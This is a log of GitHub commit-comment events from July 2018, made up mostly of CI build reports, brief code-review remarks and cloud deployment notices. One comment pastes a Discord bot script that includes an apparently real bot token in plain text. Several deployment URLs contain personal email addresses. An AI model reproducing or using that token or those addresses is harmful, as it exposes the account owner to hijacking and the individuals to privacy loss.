{"id":"7966590266","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710961,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-15T00:47:04Z","updated_at":"2018-07-15T00:47:04Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T00:47:04Z"}
{"id":"7966590940","type":"CommitCommentEvent","actor":{"login":"baironlab"},"repo":{"name":"baironlab/laPerfumeria"},"payload":{"comment":{"id":29710963,"position":null,"line":null,"path":null,"commit_id":"1fca6885fe9bb600af8ef7814d6b21c2ea5fd408","created_at":"2018-07-15T00:47:50Z","updated_at":"2018-07-15T00:47:50Z","author_association":"OWNER","body":"Perfect"}},"created_at":"2018-07-15T00:47:50Z"}
{"id":"7966592315","type":"CommitCommentEvent","actor":{"login":"serbay81"},"repo":{"name":"kenziD/python-spider"},"payload":{"comment":{"id":29710964,"position":9,"line":9,"path":"BaiduPic/get_html.py","commit_id":"0931eda5caeccbce625c6883935de483f060f24b","created_at":"2018-07-15T00:49:22Z","updated_at":"2018-07-15T00:49:22Z","author_association":"NONE","body":"sa.\r\n"}},"created_at":"2018-07-15T00:49:22Z"}
{"id":"7966592319","type":"CommitCommentEvent","actor":{"login":"takatoh"},"repo":{"name":"takatoh/fft"},"payload":{"comment":{"id":29710965,"position":15,"line":15,"path":"fft.go","commit_id":"5a2726b569b56b2868f36fbf749346b9d78ab754","created_at":"2018-07-15T00:49:22Z","updated_at":"2018-07-15T00:49:22Z","author_association":"OWNER","body":"Hi, dchapes. Thanx for your advice."}},"created_at":"2018-07-15T00:49:22Z"}
{"id":"7966593688","type":"CommitCommentEvent","actor":{"login":"OGkush7"},"repo":{"name":"dilipnitjsr/Telegram-Bot"},"payload":{"comment":{"id":29710967,"position":null,"line":null,"path":null,"commit_id":"74325047a9ed062f8ee945fbbe1fc7ea8ed052ab","created_at":"2018-07-15T00:50:56Z","updated_at":"2018-07-15T00:50:56Z","author_association":"NONE","body":"+b"}},"created_at":"2018-07-15T00:50:56Z"}
{"id":"7966600566","type":"CommitCommentEvent","actor":{"login":"tylerburleigh"},"repo":{"name":"tylerburleigh/expfactory"},"payload":{"comment":{"id":29710971,"position":null,"line":null,"path":null,"commit_id":"3c75839ae7e4541852da5a0f9dcab6e78a687845","created_at":"2018-07-15T00:59:03Z","updated_at":"2018-07-15T00:59:03Z","author_association":"OWNER","body":"This addresses #92"}},"created_at":"2018-07-15T00:59:03Z"}
{"id":"7966600823","type":"CommitCommentEvent","actor":{"login":"Hibin"},"repo":{"name":"Hibin/hs-test"},"payload":{"comment":{"id":29710972,"position":null,"line":null,"path":null,"commit_id":"f2580cb92c4eb8566c45d11d19b561babc6cd5ef","created_at":"2018-07-15T00:59:19Z","updated_at":"2018-07-15T00:59:19Z","author_association":"OWNER","body":"#8 "}},"created_at":"2018-07-15T00:59:19Z"}
{"id":"7966601464","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"twokul/esm-ember-cli-benchmark"},"payload":{"comment":{"id":29710976,"position":2,"line":2,"path":"README.md","commit_id":"28f8ccdc7dc54ac027dbe1d7898d2afd22740e74","created_at":"2018-07-15T01:00:08Z","updated_at":"2018-07-15T01:00:08Z","author_association":"NONE","body":"How do I test with and without `esm`?"}},"created_at":"2018-07-15T01:00:08Z"}
{"id":"7966602204","type":"CommitCommentEvent","actor":{"login":"maenujem"},"repo":{"name":"maenujem/UI5_OData_CRUD_Example"},"payload":{"comment":{"id":29710983,"position":null,"line":null,"path":null,"commit_id":"2fe078cabc3090df7c53ab44519d022b38517aa6","created_at":"2018-07-15T01:00:47Z","updated_at":"2018-07-15T01:00:47Z","author_association":"OWNER","body":"does not yet contain example but tutorial"}},"created_at":"2018-07-15T01:00:47Z"}
{"id":"7966602777","type":"CommitCommentEvent","actor":{"login":"jamega"},"repo":{"name":"kscanne/gaelspell"},"payload":{"comment":{"id":29710986,"position":null,"line":null,"path":null,"commit_id":"6009af88f8ac378e16b65c13534a8922d6613e20","created_at":"2018-07-15T01:01:19Z","updated_at":"2018-07-15T01:01:19Z","author_association":"NONE","body":"Faibh ar bith.  Tá local Makefile agam.  "}},"created_at":"2018-07-15T01:01:19Z"}
{"id":"7966602902","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710987,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-15T01:01:26Z","updated_at":"2018-07-15T01:01:26Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2940 of 2941 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 650\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-15T01:01:26Z"}
{"id":"7966607289","type":"CommitCommentEvent","actor":{"login":"jaczh"},"repo":{"name":"jaczh/t_0524"},"payload":{"comment":{"id":29710990,"position":null,"line":null,"path":null,"commit_id":"258a1956ca495802cacb03568d73d2115aaba926","created_at":"2018-07-15T01:06:41Z","updated_at":"2018-07-15T01:06:41Z","author_association":"OWNER","body":"simple web crawler"}},"created_at":"2018-07-15T01:06:41Z"}
{"id":"7966607918","type":"CommitCommentEvent","actor":{"login":"lonesome-data"},"repo":{"name":"lonesome-data/Portfolio"},"payload":{"comment":{"id":29710991,"position":null,"line":null,"path":null,"commit_id":"ac8a3de4ae3c87f64747b7ef2f4fcf02f98e11f8","created_at":"2018-07-15T01:07:22Z","updated_at":"2018-07-15T01:07:22Z","author_association":"OWNER","body":"make it so"}},"created_at":"2018-07-15T01:07:22Z"}
{"id":"7966608102","type":"CommitCommentEvent","actor":{"login":"alejandro-isaza"},"repo":{"name":"TrustWallet/trust-core"},"payload":{"comment":{"id":29710992,"position":14,"line":38,"path":"Sources/Ethereum/EthereumAddress.swift","commit_id":"9334767239a5f2f141e64dac9966bb54f249f425","created_at":"2018-07-15T01:07:36Z","updated_at":"2018-07-15T01:07:36Z","author_association":"COLLABORATOR","body":"Yes"}},"created_at":"2018-07-15T01:07:36Z"}
{"id":"7966611961","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29710997,"position":null,"line":null,"path":null,"commit_id":"28f908b8b1318b3b1ccf80ca7e3058b4506acb3d","created_at":"2018-07-15T01:11:56Z","updated_at":"2018-07-15T01:11:56Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.223`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/223) :tada:"}},"created_at":"2018-07-15T01:11:56Z"}
{"id":"7966612589","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"twokul/esm-ember-cli-benchmark"},"payload":{"comment":{"id":29710999,"position":8,"line":8,"path":"README.md","commit_id":"28f8ccdc7dc54ac027dbe1d7898d2afd22740e74","created_at":"2018-07-15T01:12:41Z","updated_at":"2018-07-15T01:12:41Z","author_association":"NONE","body":"Is there a way to do the `ember generate` run too?"}},"created_at":"2018-07-15T01:12:41Z"}
{"id":"7966612705","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29711000,"position":null,"line":null,"path":null,"commit_id":"28f908b8b1318b3b1ccf80ca7e3058b4506acb3d","created_at":"2018-07-15T01:12:49Z","updated_at":"2018-07-15T01:12:49Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.338`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404029951) :tada:"}},"created_at":"2018-07-15T01:12:49Z"}
{"id":"7966616061","type":"CommitCommentEvent","actor":{"login":"flowzeliak"},"repo":{"name":"asiagromasia/ITC250_branching"},"payload":{"comment":{"id":29711006,"position":null,"line":null,"path":null,"commit_id":"f50e02ebc8c674115063e6afcc844276d2046f1a","created_at":"2018-07-15T01:16:45Z","updated_at":"2018-07-15T01:16:45Z","author_association":"COLLABORATOR","body":"Please update the above!"}},"created_at":"2018-07-15T01:16:45Z"}
{"id":"7966616159","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29711007,"position":null,"line":null,"path":null,"commit_id":"949a6abc4099ca596172aa9abc9c48ddb83507d8","created_at":"2018-07-15T01:16:51Z","updated_at":"2018-07-15T01:16:51Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180715-011650 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180715-011650\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-15T01:16:51Z"}
{"id":"7966616602","type":"CommitCommentEvent","actor":{"login":"JonoAugustine"},"repo":{"name":"albanoj2/robinhood-api"},"payload":{"comment":{"id":29711008,"position":null,"line":null,"path":null,"commit_id":"d90d8c5a68ec3d52d641faea01cc072a4e4c3826","created_at":"2018-07-15T01:17:21Z","updated_at":"2018-07-15T01:17:21Z","author_association":"NONE","body":"@albanoj2 I am also making a [Discord Server](https://discordapp.com/) to try and build up a better support community for the Java API as well the Sanko documentation and any other wrappers. It's still being built, but here is the server if you are interested: [Robinhood API Discord](https://discord.gg/VF7FctD)"}},"created_at":"2018-07-15T01:17:21Z"}
{"id":"7966616827","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711009,"position":null,"line":null,"path":null,"commit_id":"c856107fb840bc12b99d0010186b2425b0700a1d","created_at":"2018-07-15T01:17:41Z","updated_at":"2018-07-15T01:17:41Z","author_association":"NONE","body":"Respectfully, I don't think this is a simplification...but of course, I'm curious to hear what others have to say."}},"created_at":"2018-07-15T01:17:41Z"}
{"id":"7966616873","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29711010,"position":null,"line":null,"path":null,"commit_id":"cf06861a92ee6363eac094e88e899545332dc8bc","created_at":"2018-07-15T01:17:44Z","updated_at":"2018-07-15T01:17:44Z","author_association":"NONE","body":"Congrats!\r\n\r\nHere is what I will want to do before committing (Or you can commit as is, and I will cleanup)...\r\n\r\n1) ``ThreatPawnAttackedByOne`` is an out dated name. I was thinking ``ThreatWeakPawn``, or something similar if you like. This means renaming not only inside of ``evaluate.c`` & ``evaluate.h``, but also inside ``texel.c``. You also want to change the ``#define TuneThreatPawnAttackedByOne``, which is more changes in both ``texel.c`` and ``texel.h``\r\n\r\n2) This popcount statement is really nasty. Somewhere above where we define ``pushThreat ...`` we can do something like ...\r\n\r\n```\r\nuint64_t poorlyDefended = (ei->attacked[THEM] & ~ei->attacked[US])\r\n                        | (ei->attackedBy2[THEM] & ~ei->attackedBy2[US] & ~ei->attackedBy[US][PAWN]);\r\n....\r\n....\r\ncount = popcount(pawns & ~ei->attackedBy[THEM][PAWN] & poorlyDefended);\r\n```\r\n\r\nI will try to tune this after merging, but I don't think the values will change. Also, I am going to see if we can simplify away some of the conditions, even though as is the definition makes a great deal of sense in my opinion"}},"created_at":"2018-07-15T01:17:44Z"}
{"id":"7966619247","type":"CommitCommentEvent","actor":{"login":"mwg27"},"repo":{"name":"mwg27/bbq_rental"},"payload":{"comment":{"id":29711012,"position":null,"line":null,"path":null,"commit_id":"0d54270cfdc9a52639a24e07af4567c3fc22e418","created_at":"2018-07-15T01:20:34Z","updated_at":"2018-07-15T01:20:34Z","author_association":"OWNER","body":"dropping main body here for editing"}},"created_at":"2018-07-15T01:20:34Z"}
{"id":"7966627427","type":"CommitCommentEvent","actor":{"login":"CyrusNajmabadi"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":29711029,"position":43,"line":70,"path":"src/VisualStudio/Core/Def/Implementation/Utilities/ServiceInitializer.cs","commit_id":"4890c8e1874132199adad253b14403bd0d817471","created_at":"2018-07-15T01:30:28Z","updated_at":"2018-07-15T01:30:28Z","author_association":"CONTRIBUTOR","body":"there's a risk here.  if cancellation happens after initialization happens, this effectively may cancel, not ever setting _service.  This can be problematic if someone then calls in afterwards.  They will see that  _service is null.  but they will also see that _initializer is null, not calling the initializer.\r\n\r\nit's unclear to me if that's an issue.  \r\n"}},"created_at":"2018-07-15T01:30:28Z"}
{"id":"7966628826","type":"CommitCommentEvent","actor":{"login":"Rajat20151"},"repo":{"name":"Rajat20151/BlazeBot"},"payload":{"comment":{"id":29711030,"position":1,"line":1,"path":"Procfile","commit_id":"122dd9aaad6e38813d7b51c541e1dc58e681447b","created_at":"2018-07-15T01:32:05Z","updated_at":"2018-07-15T01:32:05Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-15T01:32:05Z"}
{"id":"7966629621","type":"CommitCommentEvent","actor":{"login":"interma"},"repo":{"name":"Pivotal-DataFabric/hawq-misc"},"payload":{"comment":{"id":29711036,"position":null,"line":null,"path":null,"commit_id":"6d4b290eecb98b0faddccdf00bc8b44d01d74a50","created_at":"2018-07-15T01:33:03Z","updated_at":"2018-07-15T01:33:03Z","author_association":"MEMBER","body":"👍"}},"created_at":"2018-07-15T01:33:03Z"}
{"id":"7966631683","type":"CommitCommentEvent","actor":{"login":"mountaser"},"repo":{"name":"Dark-Matter7232/Moded_Moun_Kernel_Tissot"},"payload":{"comment":{"id":29711040,"position":null,"line":null,"path":null,"commit_id":"c325c052ddb0a7c567df19e6c6cbb21664826409","created_at":"2018-07-15T01:35:35Z","updated_at":"2018-07-15T01:35:35Z","author_association":"NONE","body":"will keep saying it xDD \r\nnice upstream dude xDDD"}},"created_at":"2018-07-15T01:35:35Z"}
{"id":"7966632951","type":"CommitCommentEvent","actor":{"login":"Rajat20151"},"repo":{"name":"Rajat20151/BlackBot"},"payload":{"comment":{"id":29711041,"position":null,"line":null,"path":null,"commit_id":"e1d6ff7ef7817a36b87f18abc0826deb32899f62","created_at":"2018-07-15T01:37:10Z","updated_at":"2018-07-15T01:37:10Z","author_association":"OWNER","body":"Yup\r\n"}},"created_at":"2018-07-15T01:37:10Z"}
{"id":"7966633976","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29711043,"position":null,"line":null,"path":null,"commit_id":"32099aa9435ba58f9ebb7021e35c5d20df8f3af3","created_at":"2018-07-15T01:38:18Z","updated_at":"2018-07-15T01:38:18Z","author_association":"COLLABORATOR","body":"スペースはOK\r\nコードを書く基本はしっかりね、基本ができてないと処理がどう以前に段違いに読みづらくなりますから\r\n読んでもらえなくなります"}},"created_at":"2018-07-15T01:38:18Z"}
{"id":"7966636119","type":"CommitCommentEvent","actor":{"login":"Rajat20151"},"repo":{"name":"Rajat20151/BlackBot"},"payload":{"comment":{"id":29711047,"position":1,"line":1,"path":"Procfile","commit_id":"e1d6ff7ef7817a36b87f18abc0826deb32899f62","created_at":"2018-07-15T01:40:52Z","updated_at":"2018-07-15T01:40:52Z","author_association":"OWNER","body":"`// Calling Packages\r\nconst Discord = require('discord.js');\r\nconst bot = new Discord.Client();\r\n\r\n// Global Settings\r\nconst prefix = '+'; // This is the prefix, you can change it to whatever you want.\r\n\r\n// Listener Event: Runs whenever a message is received.\r\nbot.on('message', message => {\r\n\r\n    // Variables - Variables make it easy to call things, since it requires less typing.\r\n    let msg = message.content.toUpperCase(); // This variable takes the message, and turns it all into uppercase so it isn't case sensitive.\r\n    let sender = message.author; // This variable takes the message, and finds who the author is.\r\n    let cont = message.content.slice(prefix.length).split(\" \"); // This variable slices off the prefix, then puts the rest in an array based off the spaces\r\n    let args = cont.slice(1); // This slices off the command in cont, only leaving the arguments.\r\n\r\n    // Commands\r\n\r\n    // Hello\r\n    if (msg === prefix + 'HELLO') { // This checks if msg (the message but in all caps), is the same as the prefix + the command in all caps.\r\n\r\n        // Now, let's send a response.\r\n        message.channel.send('~Hello ' + message.author + ' and welcome to BlazeCraft!~'); // This 'sends' the message to the channel the message was in. You can change what is in the message to whatever you want.\r\n\r\n    }\r\n\r\n\r\n        // Help\r\n        if (msg === prefix + 'HELP') { // This checks if msg (the message but in all caps), is the same as the prefix + the command in all caps.\r\n\r\n            // Now, let's send a response.\r\n            message.author.send('*Blaze Bot >> Coded by xDesi >> Prefix >> +*\\n **Commands and More Information:** \\n **Help** - Shows this Menu \\n **Hello** - Say Hello to Blaze Bot! \\n **Purge** - Removes a Specific Amount of Messages from a Channel. \\n \\n \\n - - -**Information about BlazeCraft** - - - \\n \\n \\n **You can open a support ticket in the #ticket-request channel by using -new. \\n *The Server IP, Website, and Rules can be found in #information. Thanks!* '); // This 'sends' the message to the channel the message was in. You can change what is in the message to whatever you want.\r\n            message.channel.send('Help? No worries! ' + message.author + ' , Check your DMs!');\r\n        }\r\n\r\n\r\n    // Purge\r\n    if (msg.startsWith(prefix + 'PURGE')) { // This time we have to use startsWith, since we will be adding a number to the end of the command.\r\n        // We have to wrap this in an async since awaits only work in them.\r\n        async function purge() {\r\n            message.delete(); // Let's delete the command message, so it doesn't interfere with the messages we are going to delete.\r\n\r\n            // Now, we want to check if the user has the `bot-commander` role, you can change this to whatever you want.\r\n            if (!message.member.roles.find(\"name\", \"Staff\")) { // This checks to see if they DONT have it, the \"!\" inverts the true/false\r\n                message.channel.send('You need the \\`Staff\\` role to use this command.'); // This tells the user in chat that they need the role.\r\n                return; // this returns the code, so the rest doesn't run.\r\n            }\r\n\r\n            // We want to check if the argument is a number\r\n            if (isNaN(args[0])) {\r\n                // Sends a message to the channel.\r\n                message.channel.send('Please use a number as your arguments. The amount must be less than **100** \\n Usage: ' + prefix + 'purge <amount>'); //\\n means new line.\r\n                // Cancels out of the script, so the rest doesn't run.\r\n                return;\r\n            }\r\n\r\n            const fetched = await message.channel.fetchMessages({limit: args[0]}); // This grabs the last number(args) of messages in the channel.\r\n            console.log(fetched.size + ' messages found, deleting...'); // Lets post into console how many messages we are deleting\r\n\r\n            // Deleting the messages\r\n            message.channel.bulkDelete(fetched)\r\n                .catch(error => message.channel.send(`Error: ${error}`)); // If it finds an error, it posts it into the channel.\r\n\r\n        }\r\n\r\n        // We want to make sure we call the function whenever the purge command is run.\r\n        purge(); // Make sure this is inside the if(msg.startsWith)\r\n\r\n    }\r\n});\r\n\r\n// Listener Event: Runs whenever the bot sends a ready event (when it first starts for example)\r\nbot.on('ready', () => {\r\n\r\n    // We can post into the console that the bot launched.\r\n    console.log('- - - - Good Job Desi! Bot is now on. - - - -');\r\n\r\n});\r\n\r\nbot.login('NDY3NDk4MjQyODg4ODI2OTA5.DiwUoQ.ba8YTwbIXspcJUed1m5Lr-I9QzI');`"}},"created_at":"2018-07-15T01:40:52Z"}
{"id":"7966641093","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29711058,"position":4,"line":59,"path":"src/io/jiyuujin/java/day4/PersonInfo.java","commit_id":"d04148d7c8058d008c87c7e1c4eb441c957c0a33","created_at":"2018-07-15T01:46:26Z","updated_at":"2018-07-15T01:46:26Z","author_association":"COLLABORATOR","body":"なんで問題がないのか分かってないね？\r\n「暗黙的インポート」\r\nhttps://codezine.jp/article/detail/6078\r\n\r\nSystem.out.println のSystemがなぜ突然使えるのか謎に感じなかった？\r\nそこで疑問を感じて調べてたらMathが出たときインポート文が要るかどうかピンと来るでしょ。\r\nもっと色んなことに疑問を感じられるようプログラム、文法、言語毎の癖に真剣に向き合ってみてください。"}},"created_at":"2018-07-15T01:46:26Z"}
{"id":"7966642788","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29711063,"position":null,"line":null,"path":null,"commit_id":"f9802f18c597253c5a496b7f10e2acebb34e4459","created_at":"2018-07-15T01:48:24Z","updated_at":"2018-07-15T01:48:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180715-014823 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180715-014823\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-15T01:48:24Z"}
{"id":"7966643474","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29711066,"position":null,"line":null,"path":null,"commit_id":"e405debd3da12df13254f799c389e67ed1f48b5c","created_at":"2018-07-15T01:49:13Z","updated_at":"2018-07-15T01:49:13Z","author_association":"COLLABORATOR","body":"うんまぁ好みだけど、forループ1つのときはiでもいいと思うよ、プログラムでpiyo/hoge使うくらい暗黙の了解でみんな読み慣れてるから…逆にindexとか使われたら「…ここにはなにかあるに違いない（iを使わないのだから強い意志を感じる）」と、プロは考えます。\r\nループがネストしてたりするとi,j,k...とわかりにくくなるからもちろんちゃんと単語使ってください、二次元配列とかならrow, colとか。"}},"created_at":"2018-07-15T01:49:13Z"}
{"id":"7966644053","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29711067,"position":8,"line":20,"path":"src/io/jiyuujin/java/day2/GetTotalCount.java","commit_id":"c2721ae420842fd4bc329f530d4372e8b169f9d9","created_at":"2018-07-15T01:49:58Z","updated_at":"2018-07-15T01:49:58Z","author_association":"COLLABORATOR","body":"+= を使う事によって何がいいのかは理解していますか？"}},"created_at":"2018-07-15T01:49:58Z"}
{"id":"7966645559","type":"CommitCommentEvent","actor":{"login":"Ryan-Myers"},"repo":{"name":"Ryan-Myers/canon-selphy-print"},"payload":{"comment":{"id":29711070,"position":null,"line":null,"path":null,"commit_id":"c469bc2b4a2f0001a290cb4ff7cb9cd832244685","created_at":"2018-07-15T01:51:38Z","updated_at":"2018-07-15T01:51:38Z","author_association":"OWNER","body":"Aha, I think I know your problem! You're using the latest stable version of\nthe codebase. You need to use the latest development codebase since the\ncp1300 hasn't been released in a stable build yet!\n\n\nOn Sat, Jul 14, 2018, 6:01 PM caco3, <notifications@github.com> wrote:\n\n> Cool, many congratulations! I hope it was a great day and you two had a\n> great honeymoon!\n>\n> I installed the printer using your ppd file. The installation seemed to\n> success. How ever when I try to print, I get this error: /usr/lib/cups/filter/rastertogutenprint.5.3\n> not available\n> Can you check if such file exists on your system?\n>\n> I then compiled the package myself (gutenprint-5.3.0-pre1) according your\n> instructions, also I packed it with make checkinstall. How ever I\n> couldn't find such file nor a ppd file for the CP1300 (only the one for the\n> CP1200 seems to be built)!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ryan-Myers/canon-selphy-print/commit/c469bc2b4a2f0001a290cb4ff7cb9cd832244685#commitcomment-29710667>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAyk35jN-0zsY5JiU-yZ4sD0hCzxEZY8ks5uGmpWgaJpZM4TrFb5>\n> .\n>\n"}},"created_at":"2018-07-15T01:51:38Z"}
{"id":"7966650337","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29711078,"position":null,"line":null,"path":null,"commit_id":"33c67a03c1cbbb0be0b24c3b0366f0ce23ea6157","created_at":"2018-07-15T01:56:48Z","updated_at":"2018-07-15T01:56:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180715-015648 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180715-015648\") to [dev](https://console.bluemix.net/apps/43106f4a-1e0f-49aa-972f-151642bdb536?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-15T01:56:48Z"}
{"id":"7966650964","type":"CommitCommentEvent","actor":{"login":"s26b03"},"repo":{"name":"s26b03/backend"},"payload":{"comment":{"id":29711080,"position":null,"line":null,"path":null,"commit_id":"caadecbd6b365d1d600b2fe5366c96e6a4a0994c","created_at":"2018-07-15T01:57:32Z","updated_at":"2018-07-15T01:57:32Z","author_association":"OWNER","body":"import requests\r\nfrom bs4 import invesment\r\npage = requests.get('')\r\ncompany = invesment(page.text,'html.parser')\r\nlast_links =\r\ncompany.find(class_='alphaNav')\r\nlast_link.decompose()\r\ninvestors_name_list =\r\ncompany.find(class_='BodyText')\r\ninvestors_name_list_items =\r\ninvestors_name_list.find_all('a')\r\nfor investors_name in\r\ninvestors_name_list_items:\r\nname = investors_name.contents[0]\r\nprint(names)\r\n\r\n\r\n"}},"created_at":"2018-07-15T01:57:32Z"}
{"id":"7967118876","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712150,"position":60,"line":60,"path":"src/com/itacademy/lesson2HomeWork/Task2Area.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T10:00:04Z","updated_at":"2018-07-15T10:00:04Z","author_association":"NONE","body":"тут сложнее задача, влезут ли оба дома, один-то может и влезть, но второй не факт, т.к. место займет первый, хотя площади могут быть равны"}},"created_at":"2018-07-15T10:00:04Z"}
{"id":"7967119375","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712157,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T10:00:21Z","updated_at":"2018-07-15T10:00:21Z","author_association":"MEMBER","body":"What is the synchronization point good for here? Maybe it is supposed to stand before `boost::filesystem::exists(_filename)`?"}},"created_at":"2018-07-15T10:00:21Z"}
{"id":"7967119632","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712158,"position":13,"line":13,"path":"src/com/itacademy/lesson2HomeWork/Task3Root.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T10:00:30Z","updated_at":"2018-07-15T10:00:30Z","author_association":"NONE","body":"название переменныз с маленькой буквы"}},"created_at":"2018-07-15T10:00:30Z"}
{"id":"7967119811","type":"CommitCommentEvent","actor":{"login":"hardik66"},"repo":{"name":"nebulasio/go-nebulas"},"payload":{"comment":{"id":29712160,"position":11,"line":11,"path":"mainnet/conf/genesis.conf","commit_id":"415c6ab50279aefb2ff37f447bf28a01b1e94f46","created_at":"2018-07-15T10:00:40Z","updated_at":"2018-07-15T10:00:40Z","author_association":"NONE","body":"n1HK2wagyY4FH5699SefaqKZLm4i3bTcBFE"}},"created_at":"2018-07-15T10:00:40Z"}
